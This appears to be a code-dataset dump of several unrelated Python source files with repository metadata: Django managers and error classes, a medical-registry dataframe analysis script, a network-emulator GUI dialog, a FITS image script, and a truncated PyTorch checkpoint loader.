f7192a92add38302ca93b33ef7669bbdd2fd3d64
| 1,534
|
py
|
Python
|
backend/examples/managers.py
|
daobook/doccano
|
45122687740f74f19e2578c5cf28507f0839bf16
|
[
"MIT"
] | 2
|
2021-12-11T22:25:27.000Z
|
2021-12-20T01:02:16.000Z
|
backend/examples/managers.py
|
daobook/doccano
|
45122687740f74f19e2578c5cf28507f0839bf16
|
[
"MIT"
] | 1
|
2022-02-15T10:50:18.000Z
|
2022-02-15T10:50:18.000Z
|
backend/examples/managers.py
|
daobook/doccano
|
45122687740f74f19e2578c5cf28507f0839bf16
|
[
"MIT"
] | null | null | null |
from django.db.models import Count, Manager
class ExampleManager(Manager):
def bulk_create(self, objs, batch_size=None, ignore_conflicts=False):
super().bulk_create(objs, batch_size=batch_size, ignore_conflicts=ignore_conflicts)
uuids = [data.uuid for data in objs]
examples = self.in_bulk(uuids, field_name='uuid')
return [examples[uid] for uid in uuids]
class ExampleStateManager(Manager):
def count_done(self, examples, user=None):
if user:
queryset = self.filter(example_id__in=examples, confirmed_by=user)
else:
queryset = self.filter(example_id__in=examples)
return queryset.distinct().values('example').count()
def measure_member_progress(self, examples, members):
done_count = self.filter(example_id__in=examples)\
.values('confirmed_by__username')\
.annotate(total=Count('confirmed_by'))
response = {
'total': examples.count(),
'progress': [
{
'user': obj['confirmed_by__username'],
'done': obj['total']
} for obj in done_count
]
}
members_with_progress = {o['confirmed_by__username'] for o in done_count}
for member in members:
if member.username not in members_with_progress:
response['progress'].append({
'user': member.username,
'done': 0
})
return response
| 35.674419
| 91
| 0.594524
|
from django.db.models import Count, Manager
class ExampleManager(Manager):
def bulk_create(self, objs, batch_size=None, ignore_conflicts=False):
super().bulk_create(objs, batch_size=batch_size, ignore_conflicts=ignore_conflicts)
uuids = [data.uuid for data in objs]
examples = self.in_bulk(uuids, field_name='uuid')
return [examples[uid] for uid in uuids]
class ExampleStateManager(Manager):
def count_done(self, examples, user=None):
if user:
queryset = self.filter(example_id__in=examples, confirmed_by=user)
else:
queryset = self.filter(example_id__in=examples)
return queryset.distinct().values('example').count()
def measure_member_progress(self, examples, members):
done_count = self.filter(example_id__in=examples)\
.values('confirmed_by__username')\
.annotate(total=Count('confirmed_by'))
response = {
'total': examples.count(),
'progress': [
{
'user': obj['confirmed_by__username'],
'done': obj['total']
} for obj in done_count
]
}
members_with_progress = {o['confirmed_by__username'] for o in done_count}
for member in members:
if member.username not in members_with_progress:
response['progress'].append({
'user': member.username,
'done': 0
})
return response
| true
| true
|
f7192c7b1ed57d054d205ebd4ca697e7e2c4e65c
| 10,095
|
py
|
Python
|
datapreparation/analyze.py
|
Anders-Holst/Bonsai
|
841aa4e12c8bea8945396bd232c2006260127507
|
[
"MIT"
] | null | null | null |
datapreparation/analyze.py
|
Anders-Holst/Bonsai
|
841aa4e12c8bea8945396bd232c2006260127507
|
[
"MIT"
] | null | null | null |
datapreparation/analyze.py
|
Anders-Holst/Bonsai
|
841aa4e12c8bea8945396bd232c2006260127507
|
[
"MIT"
] | null | null | null |
#! /usr/bin/env python3
""" -------------------------------
analyse.py
Copyright (C) 2018 RISE
This code was produced by RISE
The 2013-04-10 version
bonsai/src_v02/analyze.py
simple analysis of pandas dataframes data
such as
1. find duplicated rows
2. number of unique values in a column
3. number of unique values in common
between two columns in two different
files
4.
------------------------------------"""
import global_settings as gs
import numpy as np
import pandas as pd
import bonsai_io as bio
import common
import copy
def nr_of_unique_rows(df):
d = df.drop_duplicates()
return len(d)
def nr_of_unique_values_in_cols(df, cols):
c = df.drop_duplicates(subset = cols)
return len(c)
def nr_of_unique_values(df, col):
c = df[col].dropna()
c = c.drop_duplicates()
return len(c)
"""
def nr_of_unique_numeric_values(df, col):
c = df[col].dropna()
c = c.drop_duplicates()
c = c.str.isnumeric()
c = c[c].index.values
"""
def nr_of_nonnan_values(df, col):
c = df[col].dropna()
return len(c)
def nr_of_unique_digital_values(df, col):
c = df[col].dropna()
c = c.drop_duplicates()
c = c.str.isdigit()
c = c[c].index.values
# df = df.drop_duplicates(subset = col)
# df = df[ df[col].dropna().str.isdigit() ]
# df = df[ df[col].str.contains('\d', regex=True) ]
return len(c)
def duplicated_rows(df):
df['dup'] = df.duplicated()
df = df[df['dup'] == True]
return df
def print_duplicated_rows(df, nr):
dup = duplicated_rows(df)
print('Nr of rows in total', len(df))
print('Nr of duplicated rows', len(dup))
nr = min( nr,len(dup) )
if nr > 0:
print('the first', nr,' of them')
print(dup[0:nr])
return dup
def unique_number_values(df, col):
df = df.drop_duplicates(subset = col)
df = df[ df[col].str.contains('\d', regex=True) ]
return df
def info(df, name = ''):
print()
if name != '':
print()
print('--------------------------------------------------')
print()
print('\tInfo on the file\n\t' + name)
print()
print('--------------------------------------------------')
print()
df_unique_nr = nr_of_unique_rows(df)
print(' shape', df.shape)
print(' unique rows', df_unique_nr)
for c in df.columns:
print()
print('\tInfo on non-nan values of column', c)
print()
nonnan_nr = nr_of_nonnan_values(df, c)
unique_nr = nr_of_unique_values(df, c)
digital_nr = nr_of_unique_digital_values(df, c)
# numeric_nr = nr_of_unique_numeric_values(df, c)
print('non-nan values', nonnan_nr)
print(' unique values', unique_nr)
print('digital values', digital_nr)
# print('numeric values', unique_nr)
print()
# return unique_number_values(df, 'ICD10')
# df = df[ df[c].str.contains('\d', regex=True) ]
def readall():
dia = bio.read_generated_dia()
dgr = bio.read_diagroups()
per = bio.readperson()
ctr = bio.readcontrol()
inc = bio.readincare()
nic = bio.readnicare()
dru = bio.readdrug()
dcl = bio.readdrugclasses()
tre = bio.readtreatment()
sur = bio.readsurgery()
cau = bio.readcause()
data = [
dia,
dgr,
per,
ctr,
inc,
nic,
dru,
dcl,
tre,
sur,
cau
]
name = [
'diagnos ',
'diagnosgrupp ',
'person ',
'kontrollgrupp ',
'sluten v_rd ',
'_ppen v_rd ',
'l_kemedel ',
'l_kemedelsgrupper',
'behandling ',
'kirurgi ',
'orsak ',
]
return data, name
def info_on_all():
data, name = readall()
for i in range(0, len(name)):
info(data[i], name[i])
def compare_lopnr(dfx, dfy, namex = 'data 1', namey = 'data 2'):
xs = list(dfx['LopNr'].values)
ys = list(dfy['LopNr'].values)
sx = set(xs)
sy = set(ys)
cut = sx & sy
ux = sx - sy
uy = sy - sx
print()
# print('shape ' + namex + '\t\t', dfx.shape)
# print('shape ' + namey + '\t\t', dfy.shape)
# print('unique Lopnr ' + namex + '\t', len(xs))
# print('unique Lopnr ' + namey + '\t', len(ys))
print('common Lopnr\t\t\t', len(cut))
print('Lopnr in ' + namex + ' only\t', len(ux))
print('Lopnr in ' + namey + ' only\t', len(uy))
print()
ux = list(ux)
uy = list(uy)
ux.sort
uy.sort
return ux, uy
def readlopnr():
dia = bio.read_generated_dia()
per = bio.readperson()
ctr = bio.readcontrol()
inc = bio.readincare()
nic = bio.readnicare()
dru = bio.readdrug()
tre = bio.readtreatment()
sur = bio.readsurgery()
cau = bio.readcause()
data = [dia, per, ctr, inc, nic, dru, tre, sur, cau]
name = [
'diagnos ',
'person ',
'kontrollgrupp',
'sluten v_rd ',
'_ppen v_rd ',
'l_kemedel ',
'behandling ',
'kirurgi ',
'orsak ',
]
return data, name
def pairwise_lopnr_comparisions():
data, name = readlopnr()
for i in range(0, len(name)):
for j in range(i+1, len(name)):
print()
print('--------------------------------------------------')
print()
print('\tComparing ' + name[i] + ' with ' + name[j])
print()
print('--------------------------------------------------')
print()
compare_lopnr(data[i], data[j], name[i], name[j])
""" -------------------------------
4. count amd list various types of diagnosis
codes in care data
------------------------------------"""
"""
def is_icd10_class(x):
if not common.isstr(x):
return False
if common.is_icd10(x):
return False
if len(x) < 3:
return False
if not x[0].isupper():
return False
return x[1].isdigit() and x[2].isdigit()
"""
def code_count(xs):
if not isinstance(xs, str):
return 0
return len(xs.split())
def icd10_count(xs):
if not isinstance(xs, str):
return 0
count = 0
for x in xs.split():
if common.is_icd10(x):
# print(x)
count += 1
return count
def not_icd10_count(xs):
if not isinstance(xs, str):
return 0
count = 0
for x in xs.split():
if not common.is_icd10(x):
# print(x)
count += 1
return count
def icd10_class_count(xs):
if not isinstance(xs, str):
return 0
count = 0
for x in xs.split():
if common.is_icd10_class(x):
# print(x)
count += 1
return count
"""
def code_list(xs):
if not isinstance(xs, str):
return 0
return len(xs.split())
"""
def count_and_print(df, table = False):
dia = 'DIAGNOS'
dfc = copy.copy(df)
dfc['code_count'] = df[dia].apply(code_count)
dfc['icd10_count'] = df[dia].apply(icd10_count)
dfc['not_icd10_count'] = df[dia].apply(not_icd10_count)
dfc['icd10_class_count'] = df[dia].apply(icd10_class_count)
nr_of_codes = dfc['code_count'].sum()
nr_of_icd10 = dfc['icd10_count'].sum()
nr_of_not_icd10 = dfc['not_icd10_count'].sum()
nr_of_class_codes = dfc['icd10_class_count'].sum()
if table:
print('nr_of_lines\t', len(df))
print('nr_of_codes\t', nr_of_codes)
print('nr_of_icd10\t', nr_of_icd10)
print('nr_of_not_icd10\t', nr_of_not_icd10)
print('nr_of_icd10_class_codes\t', nr_of_class_codes)
else:
print(' nr_of_lines', len(df))
print(' nr_of_codes', nr_of_codes)
print(' nr_of_icd10', nr_of_icd10)
print(' nr_of_not_icd10', nr_of_not_icd10)
print(' nr_of_icd10_class_codes', nr_of_class_codes)
"""
for c in df1[dia].values:
print('\t', c)
"""
def print_dates(df, table = False):
date = 'INDATUM'
if table:
print('first date\t', df[date].min())
print('last date\t', df[date].max())
else:
print(' first date', df[date].min())
print(' last date', df[date].max())
def icd10_class_list(xs):
if not isinstance(xs, str):
return []
codes = []
for x in xs.split():
if common.is_icd10_class(x):
codes += [x]
#print(codes)
return codes
def flat(xs):
ys = []
for x in xs:
ys += x
return ys
def print_class_codes(df):
dia = 'DIAGNOS'
dfc = copy.copy(df)
dfc['icd10_class'] = df[dia].apply(icd10_class_list)
dfc['is_class'] = dfc['icd10_class'].apply(lambda x: x != [])
dfc = dfc[dfc['is_class']]
codes = np.unique(flat(list(dfc['icd10_class'].values)))
for c in codes:
print('\t', c)
def diagnosis_code_count(df, print_class = False, table = False):
date = 'INDATUM'
nr = 'LopNr'
icd10_start = np.datetime64('1998-01-01')
"""
size0 = len(df)
df = df.dropna().reset_index(drop=True)
print('nr of empty lines:', size0- len(df))
"""
df[date] = df[date].apply(bio.str2time)
df = df.sort_values(date).dropna().reset_index(drop=True)
df1 = df[df[date] < icd10_start]
df2 = df[df[date] >= icd10_start]
print()
print('code counts before 1998_01_01:')
print()
print_dates(df1, table = table)
count_and_print(df1, table = table)
print()
print('code counts from 1998_01_01')
print()
print_dates(df2, table = table)
count_and_print(df2, table = table)
if print_class:
print()
print(' all icd10_class_codes:')
print_class_codes(df2)
print()
| 22.995444
| 71
| 0.525706
|
import global_settings as gs
import numpy as np
import pandas as pd
import bonsai_io as bio
import common
import copy
def nr_of_unique_rows(df):
d = df.drop_duplicates()
return len(d)
def nr_of_unique_values_in_cols(df, cols):
c = df.drop_duplicates(subset = cols)
return len(c)
def nr_of_unique_values(df, col):
c = df[col].dropna()
c = c.drop_duplicates()
return len(c)
def nr_of_nonnan_values(df, col):
c = df[col].dropna()
return len(c)
def nr_of_unique_digital_values(df, col):
c = df[col].dropna()
c = c.drop_duplicates()
c = c.str.isdigit()
c = c[c].index.values
return len(c)
def duplicated_rows(df):
df['dup'] = df.duplicated()
df = df[df['dup'] == True]
return df
def print_duplicated_rows(df, nr):
dup = duplicated_rows(df)
print('Nr of rows in total', len(df))
print('Nr of duplicated rows', len(dup))
nr = min( nr,len(dup) )
if nr > 0:
print('the first', nr,' of them')
print(dup[0:nr])
return dup
def unique_number_values(df, col):
df = df.drop_duplicates(subset = col)
df = df[ df[col].str.contains('\d', regex=True) ]
return df
def info(df, name = ''):
print()
if name != '':
print()
print('--------------------------------------------------')
print()
print('\tInfo on the file\n\t' + name)
print()
print('--------------------------------------------------')
print()
df_unique_nr = nr_of_unique_rows(df)
print(' shape', df.shape)
print(' unique rows', df_unique_nr)
for c in df.columns:
print()
print('\tInfo on non-nan values of column', c)
print()
nonnan_nr = nr_of_nonnan_values(df, c)
unique_nr = nr_of_unique_values(df, c)
digital_nr = nr_of_unique_digital_values(df, c)
print('non-nan values', nonnan_nr)
print(' unique values', unique_nr)
print('digital values', digital_nr)
print()
def readall():
dia = bio.read_generated_dia()
dgr = bio.read_diagroups()
per = bio.readperson()
ctr = bio.readcontrol()
inc = bio.readincare()
nic = bio.readnicare()
dru = bio.readdrug()
dcl = bio.readdrugclasses()
tre = bio.readtreatment()
sur = bio.readsurgery()
cau = bio.readcause()
data = [
dia,
dgr,
per,
ctr,
inc,
nic,
dru,
dcl,
tre,
sur,
cau
]
name = [
'diagnos ',
'diagnosgrupp ',
'person ',
'kontrollgrupp ',
'sluten v_rd ',
'_ppen v_rd ',
'l_kemedel ',
'l_kemedelsgrupper',
'behandling ',
'kirurgi ',
'orsak ',
]
return data, name
def info_on_all():
data, name = readall()
for i in range(0, len(name)):
info(data[i], name[i])
def compare_lopnr(dfx, dfy, namex = 'data 1', namey = 'data 2'):
xs = list(dfx['LopNr'].values)
ys = list(dfy['LopNr'].values)
sx = set(xs)
sy = set(ys)
cut = sx & sy
ux = sx - sy
uy = sy - sx
print()
print('common Lopnr\t\t\t', len(cut))
print('Lopnr in ' + namex + ' only\t', len(ux))
print('Lopnr in ' + namey + ' only\t', len(uy))
print()
ux = list(ux)
uy = list(uy)
ux.sort
uy.sort
return ux, uy
def readlopnr():
dia = bio.read_generated_dia()
per = bio.readperson()
ctr = bio.readcontrol()
inc = bio.readincare()
nic = bio.readnicare()
dru = bio.readdrug()
tre = bio.readtreatment()
sur = bio.readsurgery()
cau = bio.readcause()
data = [dia, per, ctr, inc, nic, dru, tre, sur, cau]
name = [
'diagnos ',
'person ',
'kontrollgrupp',
'sluten v_rd ',
'_ppen v_rd ',
'l_kemedel ',
'behandling ',
'kirurgi ',
'orsak ',
]
return data, name
def pairwise_lopnr_comparisions():
data, name = readlopnr()
for i in range(0, len(name)):
for j in range(i+1, len(name)):
print()
print('--------------------------------------------------')
print()
print('\tComparing ' + name[i] + ' with ' + name[j])
print()
print('--------------------------------------------------')
print()
compare_lopnr(data[i], data[j], name[i], name[j])
def code_count(xs):
if not isinstance(xs, str):
return 0
return len(xs.split())
def icd10_count(xs):
if not isinstance(xs, str):
return 0
count = 0
for x in xs.split():
if common.is_icd10(x):
count += 1
return count
def not_icd10_count(xs):
if not isinstance(xs, str):
return 0
count = 0
for x in xs.split():
if not common.is_icd10(x):
count += 1
return count
def icd10_class_count(xs):
if not isinstance(xs, str):
return 0
count = 0
for x in xs.split():
if common.is_icd10_class(x):
count += 1
return count
def count_and_print(df, table = False):
dia = 'DIAGNOS'
dfc = copy.copy(df)
dfc['code_count'] = df[dia].apply(code_count)
dfc['icd10_count'] = df[dia].apply(icd10_count)
dfc['not_icd10_count'] = df[dia].apply(not_icd10_count)
dfc['icd10_class_count'] = df[dia].apply(icd10_class_count)
nr_of_codes = dfc['code_count'].sum()
nr_of_icd10 = dfc['icd10_count'].sum()
nr_of_not_icd10 = dfc['not_icd10_count'].sum()
nr_of_class_codes = dfc['icd10_class_count'].sum()
if table:
print('nr_of_lines\t', len(df))
print('nr_of_codes\t', nr_of_codes)
print('nr_of_icd10\t', nr_of_icd10)
print('nr_of_not_icd10\t', nr_of_not_icd10)
print('nr_of_icd10_class_codes\t', nr_of_class_codes)
else:
print(' nr_of_lines', len(df))
print(' nr_of_codes', nr_of_codes)
print(' nr_of_icd10', nr_of_icd10)
print(' nr_of_not_icd10', nr_of_not_icd10)
print(' nr_of_icd10_class_codes', nr_of_class_codes)
def print_dates(df, table = False):
date = 'INDATUM'
if table:
print('first date\t', df[date].min())
print('last date\t', df[date].max())
else:
print(' first date', df[date].min())
print(' last date', df[date].max())
def icd10_class_list(xs):
if not isinstance(xs, str):
return []
codes = []
for x in xs.split():
if common.is_icd10_class(x):
codes += [x]
return codes
def flat(xs):
ys = []
for x in xs:
ys += x
return ys
def print_class_codes(df):
dia = 'DIAGNOS'
dfc = copy.copy(df)
dfc['icd10_class'] = df[dia].apply(icd10_class_list)
dfc['is_class'] = dfc['icd10_class'].apply(lambda x: x != [])
dfc = dfc[dfc['is_class']]
codes = np.unique(flat(list(dfc['icd10_class'].values)))
for c in codes:
print('\t', c)
def diagnosis_code_count(df, print_class = False, table = False):
date = 'INDATUM'
nr = 'LopNr'
icd10_start = np.datetime64('1998-01-01')
df[date] = df[date].apply(bio.str2time)
df = df.sort_values(date).dropna().reset_index(drop=True)
df1 = df[df[date] < icd10_start]
df2 = df[df[date] >= icd10_start]
print()
print('code counts before 1998_01_01:')
print()
print_dates(df1, table = table)
count_and_print(df1, table = table)
print()
print('code counts from 1998_01_01')
print()
print_dates(df2, table = table)
count_and_print(df2, table = table)
if print_class:
print()
print(' all icd10_class_codes:')
print_class_codes(df2)
print()
| true
| true
|
f7192ca4418b9d3bb4703a309575a6c835793c29
| 2,000
|
py
|
Python
|
daemon/core/gui/dialogs/mobilityconfig.py
|
montag451/core
|
3be162b0b0f54b35520b980023abdfad4ff5e489
|
[
"BSD-2-Clause"
] | null | null | null |
daemon/core/gui/dialogs/mobilityconfig.py
|
montag451/core
|
3be162b0b0f54b35520b980023abdfad4ff5e489
|
[
"BSD-2-Clause"
] | null | null | null |
daemon/core/gui/dialogs/mobilityconfig.py
|
montag451/core
|
3be162b0b0f54b35520b980023abdfad4ff5e489
|
[
"BSD-2-Clause"
] | null | null | null |
"""
mobility configuration
"""
from tkinter import ttk
from typing import TYPE_CHECKING
import grpc
from core.gui.dialogs.dialog import Dialog
from core.gui.errors import show_grpc_error
from core.gui.themes import PADX, PADY
from core.gui.widgets import ConfigFrame
if TYPE_CHECKING:
from core.gui.app import Application
from core.gui.graph.node import CanvasNode
class MobilityConfigDialog(Dialog):
def __init__(
self, master: "Application", app: "Application", canvas_node: "CanvasNode"
):
super().__init__(
master,
app,
f"{canvas_node.core_node.name} Mobility Configuration",
modal=True,
)
self.canvas_node = canvas_node
self.node = canvas_node.core_node
self.config_frame = None
self.has_error = False
try:
self.config = self.app.core.get_mobility_config(self.node.id)
self.draw()
except grpc.RpcError as e:
self.has_error = True
show_grpc_error(e, self.app, self.app)
self.destroy()
def draw(self):
self.top.columnconfigure(0, weight=1)
self.top.rowconfigure(0, weight=1)
self.config_frame = ConfigFrame(self.top, self.app, self.config)
self.config_frame.draw_config()
self.config_frame.grid(sticky="nsew", pady=PADY)
self.draw_apply_buttons()
def draw_apply_buttons(self):
frame = ttk.Frame(self.top)
frame.grid(sticky="ew")
for i in range(2):
frame.columnconfigure(i, weight=1)
button = ttk.Button(frame, text="Apply", command=self.click_apply)
button.grid(row=0, column=0, padx=PADX, sticky="ew")
button = ttk.Button(frame, text="Cancel", command=self.destroy)
button.grid(row=0, column=1, sticky="ew")
def click_apply(self):
self.config_frame.parse_config()
self.app.core.mobility_configs[self.node.id] = self.config
self.destroy()
| 30.769231
| 82
| 0.643
|
from tkinter import ttk
from typing import TYPE_CHECKING
import grpc
from core.gui.dialogs.dialog import Dialog
from core.gui.errors import show_grpc_error
from core.gui.themes import PADX, PADY
from core.gui.widgets import ConfigFrame
if TYPE_CHECKING:
from core.gui.app import Application
from core.gui.graph.node import CanvasNode
class MobilityConfigDialog(Dialog):
def __init__(
self, master: "Application", app: "Application", canvas_node: "CanvasNode"
):
super().__init__(
master,
app,
f"{canvas_node.core_node.name} Mobility Configuration",
modal=True,
)
self.canvas_node = canvas_node
self.node = canvas_node.core_node
self.config_frame = None
self.has_error = False
try:
self.config = self.app.core.get_mobility_config(self.node.id)
self.draw()
except grpc.RpcError as e:
self.has_error = True
show_grpc_error(e, self.app, self.app)
self.destroy()
def draw(self):
self.top.columnconfigure(0, weight=1)
self.top.rowconfigure(0, weight=1)
self.config_frame = ConfigFrame(self.top, self.app, self.config)
self.config_frame.draw_config()
self.config_frame.grid(sticky="nsew", pady=PADY)
self.draw_apply_buttons()
def draw_apply_buttons(self):
frame = ttk.Frame(self.top)
frame.grid(sticky="ew")
for i in range(2):
frame.columnconfigure(i, weight=1)
button = ttk.Button(frame, text="Apply", command=self.click_apply)
button.grid(row=0, column=0, padx=PADX, sticky="ew")
button = ttk.Button(frame, text="Cancel", command=self.destroy)
button.grid(row=0, column=1, sticky="ew")
def click_apply(self):
self.config_frame.parse_config()
self.app.core.mobility_configs[self.node.id] = self.config
self.destroy()
| true
| true
|
f7192d36362e57de19098cfbb44d604a21beea70
| 27
|
py
|
Python
|
src/user/__init__.py
|
aleksandrgordienko/melissa-quiz
|
49b165acc9aae0ad84cf751cbeb4f6a27dd5ab0f
|
[
"MIT"
] | null | null | null |
src/user/__init__.py
|
aleksandrgordienko/melissa-quiz
|
49b165acc9aae0ad84cf751cbeb4f6a27dd5ab0f
|
[
"MIT"
] | null | null | null |
src/user/__init__.py
|
aleksandrgordienko/melissa-quiz
|
49b165acc9aae0ad84cf751cbeb4f6a27dd5ab0f
|
[
"MIT"
] | null | null | null |
from user.user import User
| 13.5
| 26
| 0.814815
|
from user.user import User
| true
| true
|
f7192d364390595ddfd11a6ee7c5d20a2c7dadff
| 759
|
py
|
Python
|
revibe/_errors/accounts.py
|
Revibe-Music/core-services
|
6b11cf16ad2c35d948f3a5c0e7a161e5b7cfc1b2
|
[
"MIT"
] | 2
|
2022-01-24T23:30:18.000Z
|
2022-01-26T00:21:22.000Z
|
revibe/_errors/accounts.py
|
Revibe-Music/core-services
|
6b11cf16ad2c35d948f3a5c0e7a161e5b7cfc1b2
|
[
"MIT"
] | null | null | null |
revibe/_errors/accounts.py
|
Revibe-Music/core-services
|
6b11cf16ad2c35d948f3a5c0e7a161e5b7cfc1b2
|
[
"MIT"
] | null | null | null |
from rest_framework.exceptions import APIException
from revibe._errors import network
from revibe._helpers import status
# -----------------------------------------------------------------------------
class AccountError(APIException):
status_code = status.HTTP_409_CONFLICT
default_detail = "The request could not be completed, please try again"
default_code = 'conflict'
class AccountNotFound(network.UnauthorizedError):
default_detail = "Could not identify the current user, please try again"
class NotArtistError(network.ForbiddenError):
default_detail = "Could not identify the current artist"
class ProfileNotFoundError(network.ExpectationFailedError):
default_detail = "The user's profile information could not be found"
| 33
| 79
| 0.715415
|
from rest_framework.exceptions import APIException
from revibe._errors import network
from revibe._helpers import status
class AccountError(APIException):
status_code = status.HTTP_409_CONFLICT
default_detail = "The request could not be completed, please try again"
default_code = 'conflict'
class AccountNotFound(network.UnauthorizedError):
default_detail = "Could not identify the current user, please try again"
class NotArtistError(network.ForbiddenError):
default_detail = "Could not identify the current artist"
class ProfileNotFoundError(network.ExpectationFailedError):
default_detail = "The user's profile information could not be found"
| true
| true
|
f7192ecde00bc5320bdb6678d1b0c377180f6a7d
| 59
|
py
|
Python
|
resources/resources/enow/jython/pythonSrc/__init__.py
|
ENOW-IJI/ENOW-server
|
1398d5a9d037efcee2886f6c7393b5e396ab0c18
|
[
"Apache-2.0"
] | 3
|
2016-08-12T14:46:53.000Z
|
2016-08-13T02:54:58.000Z
|
resources/resources/enow/jython/pythonSrc/__init__.py
|
ENOW-IJI/ENOW-server
|
1398d5a9d037efcee2886f6c7393b5e396ab0c18
|
[
"Apache-2.0"
] | 1
|
2016-08-30T15:58:19.000Z
|
2016-08-30T15:58:19.000Z
|
python/enow/jython/pythonSrc/__init__.py
|
ENOW-IJI/api
|
415fc69fc8f1ad25f1619aca0fa932f92e8b9d09
|
[
"Apache-2.0"
] | null | null | null |
__all__ = ["preCode", "body", "postCode", "StreamToLogger"]
| 59
| 59
| 0.677966
|
__all__ = ["preCode", "body", "postCode", "StreamToLogger"]
| true
| true
|
f7192f1a1cfbc76f583f0c727d070157e0eb514b
| 542
|
py
|
Python
|
manage.py
|
preet4737/College-Event-Manager
|
c8da687adeaa4f7f16d717a554e0e7af609fd305
|
[
"MIT"
] | 3
|
2019-12-20T05:51:48.000Z
|
2020-02-01T20:56:39.000Z
|
manage.py
|
preet4737/College-Event-Manager
|
c8da687adeaa4f7f16d717a554e0e7af609fd305
|
[
"MIT"
] | 6
|
2020-03-24T05:42:57.000Z
|
2020-03-24T05:42:59.000Z
|
manage.py
|
preet4737/College-Event-Manager
|
c8da687adeaa4f7f16d717a554e0e7af609fd305
|
[
"MIT"
] | 4
|
2019-03-14T11:09:30.000Z
|
2019-03-31T18:12:59.000Z
|
#!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "project-vp.settings")
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
| 33.875
| 74
| 0.686347
|
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "project-vp.settings")
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
| true
| true
|
f7192f9313d327c6a79ea32950ca12ca646bc3cc
| 434
|
py
|
Python
|
src/accounts/migrations/0005_auto_20180606_0601.py
|
ciphertz/final
|
28cf265b0e3f1e71cd95d2bd90b5662ad6f3d4a6
|
[
"bzip2-1.0.6"
] | null | null | null |
src/accounts/migrations/0005_auto_20180606_0601.py
|
ciphertz/final
|
28cf265b0e3f1e71cd95d2bd90b5662ad6f3d4a6
|
[
"bzip2-1.0.6"
] | null | null | null |
src/accounts/migrations/0005_auto_20180606_0601.py
|
ciphertz/final
|
28cf265b0e3f1e71cd95d2bd90b5662ad6f3d4a6
|
[
"bzip2-1.0.6"
] | null | null | null |
# Generated by Django 2.0.6 on 2018-06-06 06:01
from django.conf import settings
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('accounts', '0004_userstripe'),
]
operations = [
migrations.RenameModel(
old_name='userStripe',
new_name='StripeAccount',
),
]
| 21.7
| 66
| 0.647465
|
from django.conf import settings
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('accounts', '0004_userstripe'),
]
operations = [
migrations.RenameModel(
old_name='userStripe',
new_name='StripeAccount',
),
]
| true
| true
|
f7192fe132fcf5d6519186205108fc34b3226385
| 759
|
py
|
Python
|
Week1/brightest_pixel_position_fits.py
|
vinayak1998/Data_Driven_Astronomy
|
1d0dd82b2e9066759c442807c30c70bef096d719
|
[
"MIT"
] | 2
|
2021-05-21T07:31:49.000Z
|
2022-03-28T05:25:44.000Z
|
Week1/brightest_pixel_position_fits.py
|
vinayak1998/Data_Driven_Astronomy
|
1d0dd82b2e9066759c442807c30c70bef096d719
|
[
"MIT"
] | null | null | null |
Week1/brightest_pixel_position_fits.py
|
vinayak1998/Data_Driven_Astronomy
|
1d0dd82b2e9066759c442807c30c70bef096d719
|
[
"MIT"
] | 4
|
2020-11-24T21:12:16.000Z
|
2021-09-18T12:26:45.000Z
|
import numpy as np
import time
from astropy.io import fits
import matplotlib.pyplot as plt
def load_fits(filename):
start = time.perf_counter()
hdulist = fits.open(filename)
data = hdulist[0].data
result = np.where(data == np.amax(data))
coornidates = list(zip(result[0],result[1]))
end = time.perf_counter() - start
return coornidates[0]
if __name__ == '__main__':
# Run your `load_fits` function with examples:
bright = load_fits('image1.fits')
print(bright)
# You can also confirm your result visually:
from astropy.io import fits
import matplotlib.pyplot as plt
hdulist = fits.open('image1.fits')
data = hdulist[0].data
# Plot the 2D image data
plt.imshow(data.T, cmap=plt.cm.viridis)
plt.colorbar()
plt.show()
| 25.3
| 48
| 0.708827
|
import numpy as np
import time
from astropy.io import fits
import matplotlib.pyplot as plt
def load_fits(filename):
start = time.perf_counter()
hdulist = fits.open(filename)
data = hdulist[0].data
result = np.where(data == np.amax(data))
coornidates = list(zip(result[0],result[1]))
end = time.perf_counter() - start
return coornidates[0]
if __name__ == '__main__':
bright = load_fits('image1.fits')
print(bright)
from astropy.io import fits
import matplotlib.pyplot as plt
hdulist = fits.open('image1.fits')
data = hdulist[0].data
plt.imshow(data.T, cmap=plt.cm.viridis)
plt.colorbar()
plt.show()
| true
| true
|
f719309e5d9927ab6c3ee41678119a9d8e7d506c
| 3,816
|
py
|
Python
|
development/multiImage_pytorch/persistence.py
|
anaikawadi/svbrdf-estimation
|
c977aa8448b2131af3960895afd1105d29e5484a
|
[
"MIT"
] | 14
|
2020-06-16T17:01:46.000Z
|
2021-12-10T02:02:28.000Z
|
development/multiImage_pytorch/persistence.py
|
huanyingyunhan/svbrdf-estimation
|
6c169b12210d2a92495c1ab1218dd3e4da0314a5
|
[
"MIT"
] | 1
|
2021-08-08T17:28:36.000Z
|
2021-08-13T17:20:47.000Z
|
development/multiImage_pytorch/persistence.py
|
huanyingyunhan/svbrdf-estimation
|
6c169b12210d2a92495c1ab1218dd3e4da0314a5
|
[
"MIT"
] | 5
|
2020-12-27T23:00:12.000Z
|
2021-12-10T02:02:14.000Z
|
import gc
import json
import pathlib
import torch
class Checkpoint:
def __init__(self, checkpoint=None):
self.checkpoint = checkpoint
@staticmethod
def get_checkpoint_path(checkpoint_dir):
return checkpoint_dir.joinpath("checkpoint.tar")
@staticmethod
def load_legacy(model_dir):
model_path = model_dir.joinpath("model.data")
state_path = model_dir.joinpath("state.json")
if not model_path.exists():
return None
checkpoint = {
'model_state_dict' : torch.load(model_path),
}
print("Loaded legacy model state")
if state_path.exists():
with open(state_path, 'r') as f:
state = json.load(f)
checkpoint['epoch'] = state['epoch']
print("Loaded legacy training state")
return checkpoint
@classmethod
